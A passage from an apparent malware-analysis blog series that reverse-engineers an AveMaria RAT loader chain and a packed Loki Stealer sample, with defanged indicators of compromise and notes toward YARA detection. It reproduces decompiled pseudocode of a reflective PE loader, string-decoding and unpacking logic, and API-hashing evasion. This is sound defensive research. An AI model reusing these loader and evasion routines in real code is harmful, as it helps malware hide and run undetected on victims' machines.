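PS1_EXT = decode([68750, 68816, 68819, 68753])
CLASS_NAME = decode([68782, 68805, 68820, 68750, 68791, 68805, 68802,
                     68771, 68812, 68809, 68805, 68814, 68820])

def launcher_for(path):
    """Mirror the dispatcher's branching and return the launcher name only."""
    if path.endswith(DLL_EXT):
        return "rundll32.exe"
    if path.endswith(PS1_EXT):
        return "powershell.exe -File"
    return "Start-Process"

print(DLL_EXT, PS1_EXT, CLASS_NAME)  # .dll .ps1 Net.WebClient
# Hypothetical path for illustration; the script builds it from $env:AppData.
print(launcher_for(r"C:\Users\user\AppData\Roaming\mt4.exe"))  # Start-Process
```

    Both the script's EndsWith call and Python's endswith are case-sensitive, so the model keeps the same matching behavior for the extension checks.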

    Stage 6 — Final Payload: Primary Implant

    Opening mt4.exe in IDA reveals a packed executable whose entry point invokes sub_401060 and sub_401070, signaling a loader stub rather than the true implant logic. The routine sub_401060 suppresses visible artifacts by hiding the console window via GetConsoleWindow and ShowWindow, while sub_401070 implements the actual unpacking stage: it allocates a large RWX region with VirtualAlloc, reconstructs an embedded payload by bitwise inversion of data from the .data section (unk_50C77C), and applies additional XOR-based decryption using a repeating key stored in v13. Memory protections are altered with VirtualProtect, and the MessageBoxA pointer is temporarily overwritten, followed by extremely heavy GUI call loops consistent with anti-analysis timing delays. Once reconstruction is complete, execution pivots into the decoded in-memory payload via the function pointer v4 (the shellcode entry), after which the process enters a sustained sleep loop — confirming that the real implant never exists on disk in unpacked form and is exposed only at runtime.

    Figure 15. Program entry point showing a minimal loader stub where main() immediately transfers control to sub_401060 (console hiding) followed by sub_401070 (primary unpacking routine), indicating the absence of legitimate application logic.

    Figure 16. Routine sub_401060 retrieves the process console window via GetConsoleWindow and hides it using ShowWindow(SW_HIDE), a common stealth technique to suppress visible execution.

    Figure 17. Memory-resident unpacking workflow showing RWX allocation, staged blob reconstruction, XOR-based decryption, and final execution pivot into the in-memory shellcode.
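
    The two transformations described for sub_401070 can be sketched as follows. This is a minimal Python model under loud assumptions: the order (inversion first, then XOR), the key bytes, and the demo payload are all placeholders of mine, since the sample's actual key in v13 is not reproduced in this post. The `pack` helper exists only to build test input for the round trip.

```python
def invert_bytes(blob: bytes) -> bytes:
    """Bitwise NOT of every byte."""
    return bytes(b ^ 0xFF for b in blob)

def xor_repeating(blob: bytes, key: bytes) -> bytes:
    """XOR blob with key, repeating the key as often as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

def unpack(blob: bytes, key: bytes) -> bytes:
    # Assumed order: undo the inversion first, then the XOR layer.
    return xor_repeating(invert_bytes(blob), key)

def pack(plain: bytes, key: bytes) -> bytes:
    # Inverse of unpack, used here only to create demo input.
    return invert_bytes(xor_repeating(plain, key))

KEY = b"\x13\x37\xc0\xde"           # placeholder key, not the sample's
plain = b"MZ\x90\x00demo payload"   # placeholder bytes, not the real implant
packed = pack(plain, KEY)

print(unpack(packed, KEY) == plain)  # True
```

    Because both layers are self-inverse byte operations, an analyst who recovers the key can unpack the blob offline instead of waiting for the loader to do it in a debugger.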

    Figure 18. Entry point of the decrypted shellcode showing the initial loader stub preparing registers and stack arguments before transferring execution to the next stage.

    Figure 19. Decrypted payload PE located immediately after the shellcode loader in memory, exposing the embedded executable structure with visible MZ and PE headers.

    Stepping deeper into the unpacked shellcode extracted from mt4.exe, the role of the stub becomes clear fairly quickly. The shellcode is not the final payload itself. Instead, it behaves as a reflective PE loader — a compact routine designed to reconstruct and execute another executable directly in memory.

    Rather than dropping a file to disk and launching it in the conventional way, the loader rebuilds a complete PE image inside the process address space. In other words, the code is manually performing the same tasks normally handled by the Windows loader: parsing headers, allocating memory, mapping sections, resolving imports, applying relocations, and finally jumping into the payload’s entry point. The difference is that every step happens inside memory, leaving very little traditional footprint behind.

    Figure 20. IDA pseudocode excerpt showing the shellcode which loads the decrypted payload into memory.

    Resolving Required APIs

    The first thing the loader does is resolve a handful of Windows APIs dynamically. Instead of relying on the import table, the code calls a helper routine. This function walks loaded modules, hashes exported function names, and returns the address of whichever function matches the supplied hash.

    In practice this means the loader reconstructs its API table at runtime.

    Pseudocode:

    LoadLibraryPtr = resolve_by_hash(HASH_LoadLibraryA)
    GetProcAddressPtr = resolve_by_hash(HASH_GetProcAddress)
    VirtualAllocPtr = resolve_by_hash(HASH_VirtualAlloc)
    VirtualProtectPtr = resolve_by_hash(HASH_VirtualProtect)
    ZwFlushInstructionCache = resolve_by_hash(HASH_ZwFlushInstructionCache)
    GetNativeSystemInfo = resolve_by_hash(HASH_GetNativeSystemInfo)

    Figure 21. API resolution via hashed lookups removes visible imports from the binary, requiring functionality to be reconstructed during runtime analysis.
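
    A hash-based lookup of this kind can be modeled without touching Windows internals. In the Python sketch below, the hash function is an assumption: the post does not state which algorithm the shellcode uses, so a rotate-right-13 additive hash, a scheme frequently seen in shellcode, stands in for it. The export table is a hard-coded dictionary with made-up addresses rather than a walk over loaded modules.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def name_hash(name: str) -> int:
    """Rotate-right-13 additive hash over the ASCII name (assumed algorithm)."""
    result = 0
    for byte in name.encode("ascii"):
        result = (ror32(result, 13) + byte) & 0xFFFFFFFF
    return result

# Stand-in for the export tables of loaded modules; addresses are invented.
EXPORTS = {
    "LoadLibraryA": 0x1000,
    "GetProcAddress": 0x2000,
    "VirtualAlloc": 0x3000,
    "VirtualProtect": 0x4000,
    "ZwFlushInstructionCache": 0x5000,
    "GetNativeSystemInfo": 0x6000,
}

def resolve_by_hash(wanted: int):
    """Return the address of the first export whose name hashes to wanted."""
    for name, address in EXPORTS.items():
        if name_hash(name) == wanted:
            return address
    return None

print(hex(resolve_by_hash(name_hash("VirtualAlloc"))))  # 0x3000
```

    The analyst's usual countermeasure follows directly from this: precompute the hash of every export name in the common system DLLs and match the constants found in the shellcode against that table.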

    Locating the PE Header

    Once the API pointers are available, the loader begins parsing the embedded PE image.

    The starting point is the familiar e_lfanew offset inside the DOS header. By adding this value to the base of the in-memory buffer, the loader lands directly at the NT header.

    Conceptually it looks like this:

    DOS_HEADER = (IMAGE_DOS_HEADER*)peImageBuffer
    PE_HEADER = (IMAGE_NT_HEADERS*)(peImageBuffer + DOS_HEADER->e_lfanew)

    Figure 22. The loader locates the NT header via the e_lfanew offset, gaining full access to the embedded PE structure for subsequent reconstruction.
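    The same lookup is easy to reproduce offline against a dumped buffer. The sketch below assumes only the standard PE layout (e_lfanew is the 4-byte field at offset 0x3C of the DOS header); the synthetic buffer and the function name are illustrative.

```python
import struct


def find_nt_header_offset(image: bytes) -> int:
    """Read e_lfanew (offset 0x3C in the DOS header) and return it."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    return e_lfanew


# Synthetic buffer standing in for the decrypted payload.
image = bytearray(0x100)
image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, 0x80)  # e_lfanew points at 0x80
image[0x80:0x84] = b"PE\x00\x00"           # NT signature lives there

offset = find_nt_header_offset(bytes(image))
print(hex(offset), bytes(image[offset:offset + 4]))
```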

    Basic PE Validation

    Before doing anything expensive, the code performs a few sanity checks.

    It verifies:

    1. the “PE” signature
    2. the expected architecture (x86 in this case)
    3. several optional header flags

    If any of these checks fail, the loader simply aborts.

    if PE_HEADER->Signature != "PE"
        return 0
    if PE_HEADER->FileHeader.Machine != IMAGE_FILE_MACHINE_I386
        return 0
    if invalid_header_flags
        return 0

    Figure 23. Initial header validation checks confirm the embedded buffer contains a valid PE executable before the loader proceeds with reconstruction.
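    A rough Python equivalent of the first two checks is shown below. The optional-header flag checks are left out because the post does not say which flags the loader inspects; the function name is an assumption for illustration.

```python
import struct

IMAGE_NT_SIGNATURE = 0x00004550      # "PE\0\0" read as a little-endian DWORD
IMAGE_FILE_MACHINE_I386 = 0x014C


def is_valid_x86_pe(image: bytes) -> bool:
    """Check the MZ/PE signatures and the x86 machine type."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if e_lfanew + 6 > len(image):
        return False
    # Signature (DWORD) is followed directly by FileHeader.Machine (WORD).
    signature, machine = struct.unpack_from("<IH", image, e_lfanew)
    return signature == IMAGE_NT_SIGNATURE and machine == IMAGE_FILE_MACHINE_I386
```

    Run against a memory dump, a check like this is a quick way to confirm that a decrypted blob really is a 32-bit PE before spending time on it.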

    Determining Image Size

    Next the loader walks through the section headers to determine how large the reconstructed image will need to be.

    Each section contributes a range defined by its virtual address and size. The loader tracks the highest end address across all sections.

    max_end = 0
    for each section in PE_HEADER->Sections
    {
        end = section.VirtualAddress + section.VirtualSize
        if end > max_end
            max_end = end
    }

    Figure 24. The computed maximum section boundary defines the total memory footprint required for the executable once mapped into memory.
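    As a worked example, the calculation looks like this with three invented sections. The page-alignment helper is an assumption: the post does not show whether the loader rounds the result, although resolving GetNativeSystemInfo would be consistent with a page-size lookup.

```python
def required_image_span(sections):
    """Highest end address across (VirtualAddress, VirtualSize) pairs."""
    max_end = 0
    for virtual_address, virtual_size in sections:
        max_end = max(max_end, virtual_address + virtual_size)
    return max_end


def align_up(value: int, alignment: int) -> int:
    """Round `value` up to the next multiple of `alignment`."""
    return (value + alignment - 1) // alignment * alignment


# Hypothetical section table: (VirtualAddress, VirtualSize)
sections = [(0x1000, 0x5A30), (0x7000, 0x1200), (0x9000, 0x0400)]

span = required_image_span(sections)
print(hex(span), hex(align_up(span, 0x1000)))
```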

    Allocating Memory for the Image

    With the required size known, the loader allocates a new memory region where the reconstructed image will live.

    allocated_image = VirtualAllocPtr(
        NULL,
        PE_HEADER->OptionalHeader.SizeOfImage,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE)

    Figure 25. Memory allocation for the reconstructed image, creating an empty region large enough to hold the full executable before section mapping begins.

    Copying the PE Headers

    The loader begins reconstructing the executable by copying the PE header region from the original buffer into the newly allocated image.

    However, the copy operation is not entirely straightforward. When the wipeHeaders flag is enabled, the loader intentionally scrubs most of the DOS header area while preserving the critical offset that points to the PE header.

    for i in range(SizeOfHeaders):
        if (wipeHeaders
                and i < ntHeaderOffset
                and (i < 0x3C or i > 0x3E)):
            allocated_image[i] = 0
        else:
            allocated_image[i] = original_image[i]

    Figure 26. Selective header reconstruction during image mapping: the loader zeros most of the DOS header region while preserving the e_lfanew pointer (offset 0x3C) required to locate the NT headers; once the copy reaches the NT header boundary, the remaining structures — including the PE signature, file header, and section headers — are copied normally, producing a functional in-memory image while stripping many recognizable DOS-header artifacts often used by memory scanners.
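    The selective copy can be reproduced as a small runnable function. The bounds mirror the pseudocode above (bytes 0x3C through 0x3E are kept); the function name and test buffer are illustrative, not taken from the sample.

```python
def copy_headers(original: bytes, size_of_headers: int, wipe_headers: bool) -> bytearray:
    """Copy the header region, optionally zeroing the DOS area except e_lfanew."""
    nt_header_offset = int.from_bytes(original[0x3C:0x40], "little")
    mapped = bytearray(size_of_headers)
    for i in range(size_of_headers):
        in_dos_area = i < nt_header_offset
        # Same range as the pseudocode. Byte 0x3F is not preserved, but it is
        # already zero whenever e_lfanew is smaller than 0x1000000.
        keeps_pointer = 0x3C <= i <= 0x3E
        if wipe_headers and in_dos_area and not keeps_pointer:
            mapped[i] = 0
        else:
            mapped[i] = original[i]
    return mapped
```

    After a wiped copy the buffer no longer starts with "MZ", yet following offset 0x3C still lands on the "PE" signature, which is all later stages need.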

    Mapping the Sections

    With the headers in place, the loader begins copying the actual section data. Each section is placed at its intended virtual address inside the new memory region.

    for each section:
        destination = allocated_image + section.VirtualAddress
        source = original_image + section.PointerToRawData
        memcpy(destination, source, section.SizeOfRawData)

    Figure 27. Reconstructed image layout after section mapping, where the loader has copied headers and section contents into their respective virtual addresses, producing an in-memory structure that closely mirrors how the Windows loader would normally map the executable.
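    The file-offset to virtual-address translation is the part that tends to trip people up, so here is a minimal sketch of it. The section tuples and the function name are hypothetical; a real parser would read them from the section headers.

```python
def map_sections(raw: bytes, size_of_image: int, sections) -> bytearray:
    """Copy each section from its file offset to its virtual address.

    `sections` holds (VirtualAddress, PointerToRawData, SizeOfRawData) tuples.
    """
    image = bytearray(size_of_image)
    for virtual_address, pointer_to_raw, size_of_raw in sections:
        data = raw[pointer_to_raw:pointer_to_raw + size_of_raw]
        if virtual_address + len(data) > size_of_image:
            raise ValueError("section does not fit inside the image")
        image[virtual_address:virtual_address + len(data)] = data
    return image


# Hypothetical on-disk layout: 0x200 bytes of headers, then two tiny sections.
raw = bytes(0x200) + b"CODE" + b"DATA"
mapped = map_sections(raw, 0x3000, [(0x1000, 0x200, 4), (0x2000, 0x204, 4)])
print(bytes(mapped[0x1000:0x1004]), bytes(mapped[0x2000:0x2004]))
```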

    Resolve Imports

    The loader then walks the import directory and fills in the Import Address Table (IAT).

    Steps

    1. load required DLL
    2. resolve imported functions
    3. write addresses into IAT

    for each import_descriptor:
        dll = LoadLibrary(import_descriptor.DLLName)
        for each thunk:
            if import by ordinal:
                func = resolve_ordinal(dll, ordinal)
            else:
                func = GetProcAddress(dll, function_name)
            write func into IAT

    Figure 28. Import resolution routine reconstructing the IAT by loading each required DLL and resolving imported functions by name or ordinal before writing the resulting addresses into the mapped image.
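    The name-versus-ordinal decision comes down to one bit in each 32-bit thunk. The sketch below assumes the standard PE32 convention (high bit set means import by ordinal, otherwise the value is an RVA to a hint/name entry); `classify_thunk` is an illustrative helper, not a routine from the sample.

```python
IMAGE_ORDINAL_FLAG32 = 0x80000000


def classify_thunk(thunk: int):
    """Decide how a PE32 import thunk should be resolved."""
    if thunk & IMAGE_ORDINAL_FLAG32:
        # Low 16 bits carry the ordinal number.
        return ("ordinal", thunk & 0xFFFF)
    # Otherwise the value is an RVA to a hint/name structure.
    return ("name", thunk & 0x7FFFFFFF)


print(classify_thunk(0x80000073), classify_thunk(0x00012F40))
```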

    Applying Relocations

    If the image cannot be loaded at its preferred base address, the loader adjusts internal addresses accordingly.

    delta = allocated_image - PE_HEADER->OptionalHeader.ImageBase
    for each relocation_entry:
        *(target_address) += delta

    Figure 29. Relocation processing adjusts embedded addresses using the calculated base delta, ensuring all internal references point to the correct locations within the newly mapped image.
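    To make the delta patching concrete, the sketch below walks the standard base relocation block format (a page RVA and block size, followed by 16-bit entries whose top 4 bits are the type) and patches only HIGHLOW entries, which is what a 32-bit image needs. The buffer contents and base addresses are invented for the example.

```python
import struct

IMAGE_REL_BASED_HIGHLOW = 3


def apply_relocations(image: bytearray, reloc_data: bytes, delta: int) -> int:
    """Add `delta` to every 32-bit HIGHLOW target; return how many were patched."""
    patched = 0
    offset = 0
    while offset + 8 <= len(reloc_data):
        page_rva, block_size = struct.unpack_from("<II", reloc_data, offset)
        if block_size < 8:
            break  # malformed or terminating block
        for n in range((block_size - 8) // 2):
            (entry,) = struct.unpack_from("<H", reloc_data, offset + 8 + 2 * n)
            reloc_type, page_offset = entry >> 12, entry & 0x0FFF
            if reloc_type == IMAGE_REL_BASED_HIGHLOW:
                target = page_rva + page_offset
                (value,) = struct.unpack_from("<I", image, target)
                struct.pack_into("<I", image, target, (value + delta) & 0xFFFFFFFF)
                patched += 1
        offset += block_size
    return patched


# Hypothetical case: preferred base 0x00400000, actual allocation at 0x10000000.
image = bytearray(0x2000)
struct.pack_into("<I", image, 0x1010, 0x00401234)         # absolute pointer in the code
relocs = struct.pack("<IIHH", 0x1000, 12, 0x3010, 0x0000)  # one HIGHLOW entry plus padding
count = apply_relocations(image, relocs, 0x10000000 - 0x00400000)
print(count, hex(struct.unpack_from("<I", image, 0x1010)[0]))
```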

    Setting Section Protections

    The loader then assigns appropriate memory permissions to each section based on its characteristics.

    if (ntHeaders->FileHeader.NumberOfSections)
    {
        IMAGE_SECTION_HEADER *section =
            (IMAGE_SECTION_HEADER *)((char *)&ntHeaders->OptionalHeader.FileAlignment + v42);
        for (; v41 != 0; section++, v41--)
        {
            DWORD chars = section->Characteristics;
            DWORD size = section->SizeOfRawData;
            DWORD rva = section->VirtualAddress;
            DWORD sectionProtect;
            DWORD protect;
            if (size == 0)
                continue;
            bool isRead = (chars & IMAGE_SCN_MEM_READ) != 0;
            bool isExecute = (chars & IMAGE_SCN_MEM_EXECUTE) != 0;
            bool isWrite = (chars & IMAGE_SCN_MEM_WRITE) != 0;
            if (!isExecute)
            {
                if (isRead)
                    sectionProtect = isWrite ? PAGE_READWRITE : PAGE_READONLY;
                else
                    sectionProtect = isWrite ? PAGE_WRITECOPY : PAGE_NOACCESS;
            }
            else
            {
                if (isRead)
                    sectionProtect = isWrite ? PAGE_EXECUTE_READWRITE : PAGE_EXECUTE_READ;
                else
                    sectionProtect = isWrite ? PAGE_EXECUTE_WRITECOPY : PAGE_EXECUTE;
            }
            protect = (chars & 0x04000000)
                ? (sectionProtect | PAGE_NOCACHE)
                : sectionProtect;
            if (!VirtualProtect(
                    Actual_ImageBase + rva,
                    size,
                    protect,
                    &oldProtect))
            {
                return 0;
            }
        }
    }
    EntryPoint_Ptr =
        (void (__stdcall *)(int, int, int))
        (Actual_ImageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);
    ZwFlushInstructionCache(v42, reloc, -1, 0, 0);
    EntryPoint_Ptr(Actual_ImageBase, 1, 1);

    Figure 30. Pseudocode representation of the relocation routine showing how each relocation entry is processed to patch absolute addresses using the calculated base delta; once relocations are applied, execution flow reaches the ZwFlushInstructionCache call before transferring control to the reconstructed payload’s entry point.
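    The characteristics-to-protection mapping in the code above is easier to audit as a lookup table. The sketch below restates the same eight cases in Python using the documented Windows constant values; the function and table names are illustrative.

```python
IMAGE_SCN_MEM_NOT_CACHED = 0x04000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PAGE_NOCACHE = 0x200

# (execute, read, write) -> PAGE_* value, matching the branches in the pseudocode
PROTECTION_TABLE = {
    (False, False, False): 0x01,  # PAGE_NOACCESS
    (False, False, True): 0x08,   # PAGE_WRITECOPY
    (False, True, False): 0x02,   # PAGE_READONLY
    (False, True, True): 0x04,    # PAGE_READWRITE
    (True, False, False): 0x10,   # PAGE_EXECUTE
    (True, False, True): 0x80,    # PAGE_EXECUTE_WRITECOPY
    (True, True, False): 0x20,    # PAGE_EXECUTE_READ
    (True, True, True): 0x40,     # PAGE_EXECUTE_READWRITE
}


def section_protection(characteristics: int) -> int:
    """Translate section Characteristics into a VirtualProtect flag."""
    key = (
        bool(characteristics & IMAGE_SCN_MEM_EXECUTE),
        bool(characteristics & IMAGE_SCN_MEM_READ),
        bool(characteristics & IMAGE_SCN_MEM_WRITE),
    )
    protect = PROTECTION_TABLE[key]
    if characteristics & IMAGE_SCN_MEM_NOT_CACHED:
        protect |= PAGE_NOCACHE
    return protect


# Typical values: .text = 0x60000020, .data = 0xC0000040
print(hex(section_protection(0x60000020)), hex(section_protection(0xC0000040)))
```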

    Cache Flush and Entry Point Invocation

    Before transferring control to the reconstructed payload, the loader flushes the CPU instruction cache to ensure that the processor executes the freshly written code from the newly mapped image. Once the cache is synchronized, the loader resolves the executable’s entry point using the AddressOfEntryPoint field from the PE optional header and invokes it directly, as illustrated in Figure 30.

    Optional Export Invocation

    After the mapped module’s entry point is executed, the loader optionally performs an additional export lookup if a non-zero exportHash is provided. It parses the PE’s export directory, iterates through exported function names, and computes a ROR13-style hash for each. When the calculated hash matches the supplied value, the loader resolves the corresponding function address and invokes it with the provided arguments. This mechanism allows the loader to trigger a specific exported routine without embedding plaintext function names in the loader itself.

    if (exportHash != 0)
    {
        exportDir = imageBase + ExportDirectory;
        for each exported_function_name
        {
            hash = ROR13(name);
            if (hash == exportHash)
            {
                func = imageBase + function_address;
                func(exportArg1, exportArg2);
                break;
            }
        }
    }

    Figure 31. Pseudocode illustrating the optional export invocation routine, where the loader scans the export table, hashes each function name, and executes the export whose hash matches the supplied value.

    C2 Identification

    To identify the command-and-control endpoint, the first step is to place a breakpoint at the entry point invocation of the mapped PE, where the shellcode loader finally transfers execution to the reconstructed implant. Once execution lands inside the payload, the loaded modules can be inspected to understand which capabilities the malware is preparing to use. In this case, the presence of ws2_32.dll quickly points toward networking activity. From there, attention shifts to common DNS resolution routines such as getaddrinfo, which are typically used to resolve attacker-controlled domains before establishing outbound connections.

    Since the hostname is usually supplied as an argument to this API, placing a breakpoint on getaddrinfo allows the analyst to capture the domain directly when the function is invoked. When execution reaches this breakpoint, the domain string passed to the resolver becomes visible, revealing the potential C2 hostname used by the implant.

    For the purpose of this analysis, we will leave the investigation here. A deeper exploration of how the malware communicates with its C2 — including connection setup, protocol usage, and task handling — deserves its own dedicated analysis, which we will examine in a future post.

    Figure 32. The loader flushes the instruction cache and pivots execution to the reconstructed PE entry point, handing control from the shellcode stub to the in-memory payload.

    Figure 33. With ws2_32.dll mapped, the payload locates getaddrinfo, preparing the networking stack required for outbound C2 communication.

    Figure 34. Execution enters ws2_32.getaddrinfo, resolving the embedded hostname before the malware establishes its network channel.

    Figure 35. IDA pseudocode captures the moment the payload resolves its embedded domain through getaddrinfo, converting the hostname into a reachable C2 address.

    Indicators Of Compromise (IOCs)

    File Hashes

    Initial Loader (.HTA)
    MD5: 6114a230ccdb77219c67c47e054f881a

    Delivery Container (ISO)
    MD5: 62655c77982dbea9bfd30d0004862228

    Shortcut Dropper (.LNK)
    MD5: 2828f49cde16e65a1bee0c5c44aed8cc

    Final Payload (AveMaria RAT)
    MD5: 3bc9680077b50ad074e607b3ba700edc

    Network Indicators

    Payload Distribution

    sgtmarkets[.]com/mt4.exe
    Used to retrieve the AveMaria payload.

    sgtmarkets[.]com/h.hta
    HTA loader used in the early execution stage.

    Command-and-Control

    mt4blog[.]com
    Observed during C2 communication with the AveMaria RAT.

    References

    Zscaler ThreatLabz – Dynamic Approaches Seen in AveMaria’s Distribution Strategy – https://www.zscaler.com/blogs/security-research/dynamic-approaches-seen-avemaria-s-distribution-strategy

  • Part 2: When Strings Disappear: The Key Is the Signature

    Author: Valli-Nayagam Chokkalingam

    The Algorithm Is Not the Detection

    In Part 1, everything lived inside custom packer logic: not “malware strings,” not obvious config blobs—just the boring reality of a loader trying to stay unreadable. High entropy, dead strings, and a small decryptor sitting in the middle like a locked door. Part 2 stays in that same lane, but shifts the focus from handcrafted XOR/NOT tricks to known decryption patterns that packers love to reuse—RC4-style state shuffles, TEA/XTEA-looking round loops, tiny block mixers that scream “decrypt me” the moment you see them in IDA. The trap is that recognizing an algorithm isn’t detection by itself. RC4 or TEA showing up in a binary doesn’t make it malicious—it just means someone used crypto, and plenty of clean software does too. What actually matters is how the packer uses it: the fixed constants, the hardcoded key material, the staging around the routine, and the repeatable byte-level fingerprints that survive even when the encrypted payload changes. This part is about writing YARA for that reality—where the algorithm is only the starting point, and the real signal is the custom glue around it.

    Detect It Easy: Static Analysis First

    Before IDA, before control-flow graphs, before chasing logic that may not even be real yet, the first stop is Detect It Easy. Not because it “detects malware.” Because it detects deception. In this case, the target is a Loki Stealer sample pulled from VirusShare:

    SHA256: 0b416446c098203de4b550714e69a2715ed1c2127a4db54f3d46b47cd2d9a2be

    Packed samples don’t win by being clever—they win by being unreadable. And the fastest way to lose time is to start reversing a wrapper while believing it’s the payload.

    DIE makes that boundary obvious. The file shows up as a PE32 (32-bit GUI) compiled with Microsoft tooling—normal enough on the surface. But the real message is the heuristic flag:

    (Heur)Packer: Compressed or packed data — .text section compressed

    That line is a warning label. .text isn’t supposed to be compressed. .text is supposed to be instructions. When it looks packed, it’s rarely “optimization.” It’s almost always staging: a small loader sitting in front, hiding the real code behind an unpack step.

    Figure 1. Detect It Easy confirms this Loki Stealer sample is packed—.text is compressed, meaning the “real code” is still hiding behind a loader stage.

    The Strings view backs it up in a quiet way. No domains. No config. No obvious paths. No flashy indicators. Just Windows APIs—the boring ones—the kind that show up when a binary doesn’t want to carry personality on disk:

    GlobalAlloc, VirtualAlloc, VirtualProtect

    None of these are malicious on their own. Clean software uses them constantly. But together they sketch the familiar outline of a loader: allocate memory, rebuild something into that buffer, flip protections so it can execute, and then hand off control. The absence of “malware strings” isn’t a gap here—it’s the design.

    This is why static triage matters before deeper reversing. DIE isn’t the answer. It’s the direction. It doesn’t say what the payload does. It says the payload isn’t visible yet—and the only stable surface is the glue that survives every rebuild.

    Figure 2. The Strings tab stays intentionally empty of personality—just loader-grade APIs like GlobalAlloc, VirtualAlloc, and VirtualProtect, hinting at memory staging rather than readable intent.

    Follow the Memory: GlobalAlloc as the First Breadcrumb

    Once the file screams “packed,” the next step isn’t to read code like a story. It’s to follow infrastructure—the boring APIs the stub can’t live without. And memory allocation is always one of the first tells, because unpacking needs somewhere to build the real payload. From there, the natural next move is simple: open it in IDA and start tracing those allocation calls into the unpacking flow.

    In the Imports view, GlobalAlloc stands out immediately. Not because it’s rare, but because it’s useful. A loader doesn’t allocate memory for fun—it allocates memory because something is about to be staged, decrypted, decompressed, or reshaped into execution-ready bytes.

    Figure 3. The import table exposes GlobalAlloc—a clean pivot into the unpacking flow.

    So instead of guessing where the unpacker lives, the workflow becomes mechanical:

    pick the allocation API → jump to XREFs → land inside the staging logic.

    Following the cross-references to GlobalAlloc drops straight into a tiny helper routine: sub_403220. One clean call, one returned buffer, one pointer getting saved. No payload logic, no drama—just setup. That’s exactly what it is, so sub_403220 gets renamed to GlobalAllocWrapper.

    Figure 4. The GlobalAlloc XREF is the first crack in the wrapper—pointing straight into sub_403220.

    Figure 5. A one-liner allocator stub: GlobalAlloc in, pointer out—nothing but memory prep for the next stage.

    Cross-referencing GlobalAllocWrapper leads to 0x403240, the routine that actually uses the allocated memory. This is where “packed” stops being a label and starts being behavior—staging bytes into memory in a way that only makes sense if the next step is execution. Right after allocation, the code flips the region into an executable-ready state with VirtualProtect(lpAddress, dwSize, 0x40, …), and then a tight for loop walks byte-by-byte, copying data from an embedded blob (dword_2B92E24 + 72475) straight into that buffer. No readable intent, no strings coming back to life—just the next stage being rebuilt in memory, one byte at a time. That’s why 0x403240 gets renamed to UnpackPayloadToExecutableMemoryAndRun. The random-looking API calls inside the loop (GetModuleHandleW, SetColorAdjustment, CreateMemoryResourceNotification, etc.) aren’t “features,” they’re junk API padding: cheap clutter thrown in to break patterns, confuse analysts, and make the unpacker look busier than it really is.

    Figure 6. Cross-referencing GlobalAllocWrapper leads straight into 0x403240—the real staging routine where unpacking starts to take shape.

    Figure 7. Inside 0x403240, the loader flips the allocated region to RWX (VirtualProtect 0x40) and reconstructs the next stage byte-by-byte in a tight copy loop.

    And the placement seals it: UnpackPayloadToExecutableMemoryAndRun is the last call made inside WinMain. The program doesn’t end with application logic. It ends with a hand-off. The stub runs just long enough to allocate memory, rewrite it, mark it executable, and pass execution forward into whatever it just assembled.

    Figure 8. XREFs pin UnpackPayloadToExecutableMemoryAndRun directly back to WinMain

    Figure 9. WinMain doesn’t do much else—its final move is calling UnpackPayloadToExecutableMemoryAndRun, the hand-off into the real stage.

    Identifying the Decryption Logic

    The staging routine (UnpackPayloadToExecutableMemoryAndRun) already did the loud part: allocate memory, flip it to RWX, and rebuild a blob into lpAddress. That answers the where. The next question is the one that actually matters:

    what happens to that buffer after it’s built?

    That’s where lpAddress becomes more than a variable—it becomes a trail.

    Cross-referencing lpAddress shows it being pulled into another routine (sub_4030E0), where the pointer is treated like a working buffer: v1 = (char *)lpAddress; and then processed in a loop. This is the moment the sample stops “copying bytes” and starts doing something to them.

    And right in the middle of that loop, the real pivot appears: a call to sub_402F00(v1), repeated as the pointer moves forward (v1 += 8). That stride isn’t accidental. Eight bytes at a time is block territory—exactly the size you’d expect when something is being transformed in 64-bit chunks instead of raw stream decoding.

    Figure 10. XREFs to lpAddress reveal where the unpacked buffer gets consumed next—leading straight into the routine that starts transforming it, not just storing it.

    Figure 11. sub_4030E0 grabs lpAddress, walks it in 8-byte steps, and funnels each block into sub_402F00—the first real “decrypt this” pivot.

    Once inside sub_402F00, the shape is unmistakable. Shifts. XORs. Adds. The same variables being mixed again and again. A constant-looking shift count (v10 = 5) driving repetitive work. It reads like a block-mixing routine because that’s what it is: the kind of tight arithmetic loop packers love because it’s small, fast, and doesn’t need any strings to function.

    That’s where “TEA-like” stops being a vibe and becomes structure. The routine doesn’t need to be a perfect textbook implementation to give itself away—the round posture is there: repeated mixing, XOR chaining, shift-heavy math, and a consistent 8-byte block stride. TEA-family logic can exist in clean software too, but in a packed loader pipeline like this, it’s not decoration. It’s the engine.

    Figure 12. Inside sub_402F00, the decryption shows its shape—shift/XOR/add mixing repeated in tight rounds, the kind of math loop packers can’t hide behind.

    Then the constant shows up.

    0x9E3779B9.

    That number isn’t random filler. It’s one of those crypto fingerprints that refuses to stay quiet: the golden ratio constant used across TEA-style designs. The moment it appears alongside the shift/XOR mixing pattern, the routine stops being “maybe decryption” and becomes extremely specific. Strings can disappear. Imports can be reshuffled. Junk APIs can be sprayed everywhere. But the math still has to work, and constants like this tend to survive rebuilds untouched. So the decryption logic isn’t hiding in some giant function with a friendly name; it sits in a small arithmetic loop that a single constant gives away.

    Figure 13. sub_402F00 hardcodes 0x9E3779B9—the TEA/XTEA “golden ratio” constant that quietly fingerprints the decryptor.

    Figure 14. A quick search maps 0x9E3779B9 back to TEA—the golden ratio constant that gives the loop away.
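    The “golden ratio” label is literal: the constant is 2^32 divided by the golden ratio, rounded down. A short check using exact integer arithmetic (the function name is just for illustration):

```python
from math import isqrt


def tea_delta() -> int:
    """floor(2**32 / phi), computed as floor(2**32 * (sqrt(5) - 1) / 2)."""
    return (isqrt(5 << 64) - (1 << 32)) // 2


delta = tea_delta()
print(hex(delta), delta.to_bytes(4, "little").hex(" "))
```

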